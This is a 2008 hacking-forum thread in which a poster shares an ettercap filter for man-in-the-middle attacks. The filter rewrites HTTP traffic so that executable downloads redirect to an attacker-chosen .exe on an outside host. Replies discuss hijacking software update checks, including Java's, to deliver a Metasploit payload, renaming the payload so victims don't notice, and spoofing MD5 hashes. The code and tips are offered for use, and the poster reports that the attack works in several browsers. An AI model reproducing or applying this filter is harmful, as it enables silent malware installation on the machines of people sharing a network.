#1  
Old 08-06-2008, 10:39 AM
operat0r operat0r is online now
Senior Member
 
Join Date: Nov 2006
Posts: 172
Cool ettercap OWNAGED replace all exe's DL'ed

VIDEO:

http://blip.tv/file/1185726/

* works in firefox great
* works in opera but after about 10seconds ( this is reasonable )
* works in IE7

Code:
# replace rmccurdy with your website
# replace the url with what ever exe you like





if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("keep-alive", "close" ");
replace("Keep-Alive", "close" ");

}



if (ip.proto == TCP && search(DATA.data, ": application") ){
# enable for logging log(DECODED.data, "/tmp/log.log");
msg("found EXE\n");
# "Win32" is the first part of the exe example:
# if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
if (search(DATA.data, "Win32")) {
msg("doing nothing\n");
} else {
replace("200 OK", "301 Moved Permanently
Location: http://www.rmccurdy.com/scripts/quickclean.exe
");
msg("redirect success\n");

}
}


for example on howto use etterfilter/ettercap / more goodies:
http://forums.remote-exploit.org/showthread.php?t=12885
__________________
Skiddie powers activate !

Last edited by operat0r; 08-28-2008 at 11:18 AM.
Reply With Quote
  #2  
Old 08-06-2008, 12:39 PM
ShadowKill ShadowKill is offline
Senior Member
 
Join Date: Dec 2007
Location: /dev/null
Posts: 428
Default

Quote:
Originally Posted by operat0r View Post
I was listening to podcast pauldotcom.com was talking about evilgrade

what about ettercap /dns spoof that would replace and update agent that is a http get to an EXE or any executable for that matter.

what ever app what gets and EXE file over HTTP is replaced with a MS payload EXE

can this be done with say a simple 302 redirect for all EXE's maybe .. err
I don't really see why it couldn't be. The only issue I see is that you would need to perhaps write a script to rename your payload .EXE to that of the original. Otherwise, the user might catch it and either delete it and retry or start poking around for clues as to why they keep downloading the same file over and over again....
__________________
"There are only 10 kinds of people in this world, those who understand binary, and those who don't."
-Unknown

Compiz'd BT3 / Vista dual boot, nVidia 8800 GT, 3gb RAM, 500gb HDD, AMD 64 x2 5200+
Reply With Quote
  #3  
Old 08-06-2008, 06:04 PM
ShadowKill ShadowKill is offline
Senior Member
 
Join Date: Dec 2007
Location: /dev/null
Posts: 428
Default

Quote:
Originally Posted by operat0r View Post
Humm is that possible to have an ettercap filter pass a var to a shell script ?

think about all the apps that have updates that are not listed in the evilgrade .. adobe etc... even add support for some kind of md5 MIM so if it trys to get some md5 hash just send it the hash for your MS payload...


Code:
java updates
http://java.sun.com/update/1.6.0/map-1.6.0.xml
http://javadl-esd.sun.com/update/1.6.0/map-1.6.0.xml
http://javadl-esd.sun.com/update/1.6.0/1.6.0_07-b06.xml
maybe some kind of apache mod_rewrite that does the renaming of the file for you.. if ettercap can't do regex etc ... ?
Sounds feasible to me, but there's only one way to know for sure right?
__________________
"There are only 10 kinds of people in this world, those who understand binary, and those who don't."
-Unknown

Compiz'd BT3 / Vista dual boot, nVidia 8800 GT, 3gb RAM, 500gb HDD, AMD 64 x2 5200+
Reply With Quote
  #4  
Old 08-09-2008, 03:22 PM
ShadowKill ShadowKill is offline
Senior Member
 
Join Date: Dec 2007
Location: /dev/null
Posts: 428
Default

Quote:
Originally Posted by operat0r View Post
shoud I put exe\n or exe\r ??

still can't get it working ..

as in match exe and the new line or carriage return ?

I would assume that it'd be \n as \r is just a hard coded "Enter" correct? I'll tfiddle around with it in a while and let you know the outcome.
__________________
"There are only 10 kinds of people in this world, those who understand binary, and those who don't."
-Unknown

Compiz'd BT3 / Vista dual boot, nVidia 8800 GT, 3gb RAM, 500gb HDD, AMD 64 x2 5200+
Reply With Quote
  #5  
Old 08-19-2008, 11:36 AM
operat0r operat0r is online now
Senior Member
 
Join Date: Nov 2006
Posts: 172
Default

Ok so got it working in IE7 not sure if I need 1/2 the code in the filter but it works so have fun !
__________________
Skiddie powers activate !
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules

Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT. The time now is 11:54 AM.


Powered by vBulletin® Version 3.7.2
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.